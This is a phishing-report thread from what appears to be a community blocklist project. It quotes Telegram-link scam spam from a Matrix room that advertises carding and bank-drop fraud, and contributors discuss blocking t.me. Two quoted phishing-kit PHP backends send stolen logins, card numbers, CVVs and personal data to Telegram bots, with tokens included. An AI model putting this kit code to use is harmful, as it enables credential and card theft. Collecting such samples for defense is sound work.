Phishing | t.me #590
Comments
{
"content": {
"body": "𝗛𝗲𝗹𝗹𝗼 👋👋👋\n𝗚𝗿𝗲𝗲𝘁𝗶𝗻𝗴𝘀! 𝗔𝗿𝗲 𝘆𝗼𝘂 𝗹𝗼𝗼𝗸𝗶𝗻𝗴 𝗳𝗼𝗿 𝗮 𝘄𝗮𝘆 to make money?\n\n𝗧𝗵𝗶𝘀 𝗖𝗼𝗺𝗽𝗮𝗻𝘆 𝗛𝗮𝘀 𝗖𝗵𝗮𝗻𝗴𝗲𝗱 𝗧𝗵𝗲 𝗟𝗶𝗳𝗲 𝗢𝗳 𝗟𝗶𝘃𝗲𝘀 𝗼𝘂𝘁 𝘁𝗵𝗲𝗿𝗲. 𝗗𝗼𝗻'𝘁 𝗠𝗶𝘀𝘀 𝗧𝗵𝗶𝘀 𝗚𝗿𝗲𝗮𝘁 𝗢𝗽𝗽𝗼𝗿𝘁𝘂𝗻𝗶𝘁𝘆, 𝗜𝘁 𝗠𝗮𝘆 𝗡𝗲𝘃𝗲𝗿 𝗕𝗲 𝗧𝗵𝗲𝗿𝗲 𝗔𝗴𝗮𝗶𝗻.\n𝗛𝘂𝗿𝗿𝘆 𝘂𝗽 𝗝𝗼𝗶𝗻 𝗧𝗵𝗲 𝗪𝗶𝗻𝗻𝗶𝗻𝗴 𝗧𝗲𝗮𝗺𝘀 𝗔𝗻𝗱 𝗘𝗻𝗷𝗼𝘆 𝗬𝗼𝘂𝗿𝘀𝗲𝗹𝗳 \n\n👉𝗟𝗶𝗻𝗸 𝘁𝗼 𝗷𝗼𝗶𝗻 𝗰𝗵𝗮𝗻𝗻𝗲𝗹:\n\nhttps://t.me/+ioqje81ziAYyYTc0\n\n🖕🖕🖕🖕🖕🖕🖕\n𝗝𝗼𝗶𝗻 𝗻𝗼𝘄 𝗶𝘁 𝗽𝗮𝘆 𝗮 𝗹𝗼𝘁 💯",
"msgtype": "m.text"
},
"origin_server_ts": 1735556046191,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 75104493
},
"event_id": "$ELY4yLoggUfYoZZd5ovoPhuuz_SaCB7kzfKuglx7CtQ",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
} |
|
phishing {
"content": {
"body": "𝗛𝗲𝗹𝗹𝗼 👋👋👋\n𝗚𝗿𝗲𝗲𝘁𝗶𝗻𝗴𝘀! 𝗔𝗿𝗲 𝘆𝗼𝘂 𝗹𝗼𝗼𝗸𝗶𝗻𝗴 𝗳𝗼𝗿 𝗮 𝘄𝗮𝘆 to make money?\n\n𝗧𝗵𝗶𝘀 𝗖𝗼𝗺𝗽𝗮𝗻𝘆 𝗛𝗮𝘀 𝗖𝗵𝗮𝗻𝗴𝗲𝗱 𝗧𝗵𝗲 𝗟𝗶𝗳𝗲 𝗢𝗳 𝗟𝗶𝘃𝗲𝘀 𝗼𝘂𝘁 𝘁𝗵𝗲𝗿𝗲. 𝗗𝗼𝗻'𝘁 𝗠𝗶𝘀𝘀 𝗧𝗵𝗶𝘀 𝗚𝗿𝗲𝗮𝘁 𝗢𝗽𝗽𝗼𝗿𝘁𝘂𝗻𝗶𝘁𝘆, 𝗜𝘁 𝗠𝗮𝘆 𝗡𝗲𝘃𝗲𝗿 𝗕𝗲 𝗧𝗵𝗲𝗿𝗲 𝗔𝗴𝗮𝗶𝗻.\n𝗛𝘂𝗿𝗿𝘆 𝘂𝗽 𝗝𝗼𝗶𝗻 𝗧𝗵𝗲 𝗪𝗶𝗻𝗻𝗶𝗻𝗴 𝗧𝗲𝗮𝗺𝘀 𝗔𝗻𝗱 𝗘𝗻𝗷𝗼𝘆 𝗬𝗼𝘂𝗿𝘀𝗲𝗹𝗳 \n\n👉𝗟𝗶𝗻𝗸 𝘁𝗼 𝗷𝗼𝗶𝗻 𝗰𝗵𝗮𝗻𝗻𝗲𝗹:\n\nhttps://t.me/+ioqje81ziAYyYTc0\n\n🖕🖕🖕🖕🖕🖕🖕\n𝗝𝗼𝗶𝗻 𝗻𝗼𝘄 𝗶𝘁 𝗽𝗮𝘆 𝗮 𝗹𝗼𝘁 💯",
"msgtype": "m.text"
},
"origin_server_ts": 1735556046191,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 75104493
},
"event_id": "$ELY4yLoggUfYoZZd5ovoPhuuz_SaCB7kzfKuglx7CtQ",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
}
|
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735600325944,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 30824740
},
"event_id": "$JBed9or2sRGAtzf7frFpNcQ_tH3wCrwpPwdYrbaE5KM",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
}
|
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735600409434,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 30741250
},
"event_id": "$4leHgNijrYpj38WqhLVTIR5MvncxaBbWJpRoYzSFj0g",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
}
|
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735611816015,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 19334669
},
"event_id": "$b-BoL6cPaICgJ4mzYo2o8z8oFV9Nzxs951m9f5FFdgc",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
}
|
{
"content": {
"body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅",
"msgtype": "m.text"
},
"origin_server_ts": 1735633316735,
"sender": "@_oftc_jayhay[m]:matrix.org",
"type": "m.room.message",
"unsigned": {
"membership": "join",
"age": 189
},
"event_id": "$CHwYjV3cpHKwsRXksjyM9Qbnv4g3zwdc37np-hOd5so",
"room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org"
}
Source mypdns/matrix#698 (comment) |
|
While I do agree that telegram is a cesspool of criminal activity I worry that blocking their link shortener could cause unintended collateral damage. For example, my school's honor society has been working with a group of Ukrainian students for the past semester and they primarily use telegram for messaging. |
Tech them about matrix.org... their is a free open, privacy respecting instance at matrix.rocks 😮 and that is real E2EE messaging @g0d33p3rsec could you run the test of the URI on |
|
I've tried recommending alternatives. Unfortunately, it's what they're used to, similar to Facebook or Windows users. Matrix/ Riot isn't bad but was a bit of a nightmare to admin as I recall.
Sure, I'll try to do a fly over later today once I catch up on some of my writing. |
https://urlscan.io/result/ca114b9b-e933-470e-ba2f-88dabce459d7/
https://urlscan.io/result/67ed8728-30d4-48fb-abaa-01a10fa5e79d/ I was mistaken earlier when I said it was a link shortener. |
You're not the only one, thought it all was url_shortener with random destinations, but non the less, still a dangerous domain. @Phishing-Database/contributors What should we do with these urls, in your opinion? |
agreed, though I see the revised understanding as less of a threat than a link shortener, which are often directly used in attack chains. By comparison, the profile/ chat redirection at least requires a threat actor to still do the social engineering work. On the other hand, I can also see some limited protections such a mechanism could offer legitimate users by partially obfuscating their phone numbers.
I'll have to think about this some more. I don't have a good answer off the top of my head, likely due to an absence of information regarding the different ways this data source is used by end users. I haven't played with Matrix/ Riot in a few years, is there a way to add the URI to some sort of inbound filtering there? If you are familiar with Pleroma, perhaps something like their message rewrite facility for dealing with fediverse traffic. |
|
Some additional information from my recent pulls related to telegram but not the #604 uses Click to expand.
#625 and #626 use Click to expand.<?php
$chatId = "6262739564";
$botUrl = "bot6178951135:AAE6wPSUmFhb-fxBLxv6YUgYepKMRVK8pBY";
$telegram = "on"; // off if u don't need result to telegram
$user_ids = "[email protected]"; // your email here
extract($_REQUEST);
# Store Post values in variables
// Here variable $a is just an example (replace with your own variables)
$_SESSION['ai'] = $_POST['ai'];
$_SESSION['pr'] = $_POST['pr'];
$ip = $_SERVER['REMOTE_ADDR'];
# Format for Telegram & Discord
// Here variable $a is just an example (replace with your own variables)
$data = "
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++
EMAIL = ".$_SESSION['ai']."
PassWord = ".$_SESSION['pr']."
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++
IP = http://www.geoplugin.net/json.gp?ip=$ip
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++
";
$msg = "
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++<br>
EMAIL = ".$_SESSION['ai']." <br>
PassWord = ".$_SESSION['pr']." <br>
+++++++++++� CoDeX@EXCEL LOGIN INFO �+++++++++++
<br>
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++<br>
IP = http://www.geoplugin.net/json.gp?ip=$ip <br>
+++++++++++� CoDeX@EXCEL IP INFOS �+++++++++++ <br>
";
// Email send function
$sender = 'From: 💎 C0DeX 💎 <[email protected]>';
$sub="NEW EXCEL LOGIN FROM [$ip]";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= ''.$sender.'' . "\r\n";
$result=mail($user_ids, $sub, $msg, $headers);
// Telegram send function
$txt = $data;
if ($telegram == "on"){
$send = ['chat_id'=>$chatId,'text'=>$txt];
$web_telegram = "https://api.telegram.org/{$botUrl}";
$ch = curl_init($web_telegram . '/sendMessage');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($send));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
} |
Used that on matrix.rocks until I switched to MissKey, as the JScripts constrantly made my browsers freezing.
Would you mind to elaborate, it's properly clear in Eenglish, what this refers to, in translation, it can means a lot of thing, in diff contents While typing, do you mean user filtering on msg? |
Nice, I was around when the project started and on the fediverse before Mastodon existed, though only recently returned.
ah, yeah, single page apps can get pretty greedy for resources. Did you try any of the alternative frontends?
either user or instance level, just something that would let you drop any messages with a another outbound connection to telegram from a site I just added: from #634 Click to expand<?php
include('anti.php');
header("Access-Control-Allow-Origin: *"); // Replace '*' with your allowed origins
function getRealIpAddr()
{
if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
$token = "5834814986:AAGX9OeRyUYqwPIBDGtk7kwtmJkXmCQIKdk";
$user_ids = array("-4232044246");
// Ensure all required variables are set
if (
isset($_POST['billfirstname'], $_POST['reference'], $_POST['billlastname'], $_POST['billdateofbi1'], $_POST['billconfemail'], $_POST['billphonenumb'], $_POST['billaddrline1'], $_POST['billcitytown1'], $_POST['billpostcode1'])
) {
$ip = getRealIpAddr();
$reference = urldecode($_POST['reference']);
$firstname = urldecode($_POST['billfirstname']);
$lastname = urldecode($_POST['billlastname']);
$billdateofbi1 = urldecode($_POST['billdateofbi1']);
$emailcon = urldecode($_POST['billconfemail']);
$phonenum = urldecode($_POST['billphonenumb']);
$billing1 = urldecode($_POST['billaddrline1']);
$citytown = urldecode($_POST['billcitytown1']);
$postcode = urldecode($_POST['billpostcode1']);
//$country = getCountryFromIp($ip);
// Construct the message
$message = "#---------------++==[ ⚡️ New BILL Rez ⚡️ ]==++-------------#\n";
$message .= "FULL NAME : $firstname $lastname\n";
$message .= "DOB : $billdateofbi1\n";
$message .= "EMAIL ADD : $emailcon\n";
$message .= "PHONE NUM : +61$phonenum\n";
$message .= "BILLING 1 : $billing1\n";
$message .= "CITY/TOWN : $citytown\n";
$message .= "ZIP CODE : $postcode\n";
$message .= "#---------------++==[ 💻 USER INFO 💻 ]==++-------------#\n";
$message .= "IP : $ip\n";
$message .= "#---------------++==[ ⚠️ BY ELMOJREM ⚠️ ]==++-------------#\n";
// Send message to Telegram chat for each user_id
foreach ($user_ids as $user_id) {
$website = "https://api.telegram.org/bot" . $token;
$params = [
'chat_id' => $user_id,
'text' => $message,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
}
}
// Ensure all required variables are set
if (
isset(
$_POST['billfullname'],
$_POST['reference'],
$_POST['billccnumber'],
$_POST['billexpirati'],
$_POST['billexpircvv']
)
) {
$ip = getRealIpAddr();
$reference = urldecode($_POST['reference']);
$billfullname = urldecode($_POST['billfullname']);
$billccnumber = urldecode($_POST['billccnumber']);
$billexpirati = urldecode($_POST['billexpirati']);
$billexpircvv = urldecode($_POST['billexpircvv']);
// Validate and sanitize credit card information
$realcc = str_replace(' ', '', $billccnumber);
// Additional validation and sanitization steps if needed
// Construct the message
$message = "#---------------++==[ ⚡️ New CVV Rez ⚡️ ]==++-------------#\n";
$message .= "FULL NAME : $billfullname\n";
$message .= "CC NUMBER : $realcc\n";
$message .= "EXPIRATION : $billexpirati\n";
$message .= "CVV NUMBR : $billexpircvv\n";
$message .= "#---------------++==[ 💻 USER INFO 💻 ]==++-------------#\n";
$message .= "IP : $ip\n";
$message .= "#---------------++==[ ⚠️ BY ELMOJREM ⚠️ ]==++-------------#\n";
// Send message to Telegram chat for each user_id
foreach ($user_ids as $user_id) {
$website = "https://api.telegram.org/bot" . $token;
$params = [
'chat_id' => $user_id,
'text' => $message,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);
}
}
// Ensure all required variables are set
if (isset($_POST['text_input'], $_GET['ccnumber'])) {
$ccnumb = base64_decode($_GET['ccnumber']);
$Cpode = $_POST['text_input'];
// Validate and sanitize credit card number and VBV code
$realcc = str_replace(' ', '', $ccnumb);
// Additional validation and sanitization steps if needed
// Construct the message
$message = "#---------------++==[ ⚡️ New VBV Rez ⚡️ ]==++-------------#\n";
$message .= "CCNUMB : $realcc\n";
$message .= "VBV : $Cpode\n";
$message .= "#---------------++==[ 💻 USER INFO 💻 ]==++-------------#\n";
$message .= "IP : " . getRealIpAddr() . "\n";
$message .= "#---------------++==[ ⚠️ BY ELMOJREM ⚠️ ]==++-------------#\n";
// Send message to Telegram chat for each user_id
foreach ($user_ids as $user_id) {
$website = "https://api.telegram.org/bot" . $token;
$params = [
'chat_id' => $user_id,
'text' => $message,
];
$ch = curl_init($website . '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
// Handle cURL errors
if ($result === false) {
$error = curl_error($ch);
// Handle the error (e.g., log the error, display an error message, etc.)
// Avoid showing specific cURL errors to users for security reasons
}
curl_close($ch);
}
// Clear HTTP headers and output an "ok" response
//header_remove();
echo 'ok';
exit();
}
?> |
|
Well, MissKey also let the admins make some rules, on the Ban lists, to exclude any posts containing specific words. It's supposed to support regex, but never had it working properly. |
|
considering a bot to ingest all of the telegram credentials I'm harvesting and send each a message congratulating them on being added to the database. |
|
UUhhh have seen a similar bot for cloudflare... @migigator, not popular... like at all... but if you are bored, I would almost, give my left arm to have this one working https://github.com/mypdns/MK-Cleaner |
What are the subjects of the phishing (domains, URLs or IPs)?
example.comsub.example.comhttps://example.com/pagehttps://sub.example.com/pageexample.com192.168.0.0/16t.me
web.telegram.org
What are the impersonated domains?
t.me (self)
Where or how did you discover this phishing?
I discovered this phishing by...
I was targeted by this phishing by...
Matrix.org client
Do you have a screenshot?
Screenshot
Related external source
{ "content": { "body": "Methods ! Walkthroughs ! & Proof ! I got it . \n\n💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲💲\n\nCashapp \nChime \nApple Pay \nCpns \nDave method \nCoinbase loading \nAirb&b \nVerizon \niPhone 15 method \nApple product method \nVermont Rent relief \nSba method \nCarding \ncc sites \nGas station Sauce ( free gas ) \nBank drops \nWells Fargo Loan sauce\nShein method \nTruist\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n\nhttps://t.me/+fk5a2eNOe9BhY2I8\n🎖️🎖️🎖️🏅🏅🏅🎖️🎖️🎖️🏅🏅", "msgtype": "m.text" }, "origin_server_ts": 1735538891056, "sender": "@_oftc_jayhay[m]:matrix.org", "type": "m.room.message", "unsigned": { "membership": "join", "age": 92257377 }, "event_id": "$JwmMvzsppX3_oe0xbTEwnXZT0ScLFj3ZIYo3qCEUiPY", "room_id": "!RGSWbwoTxVJsRsIZCR:matrix.org" }Additional Information or Context
I have also noticed that...
The text was updated successfully, but these errors were encountered: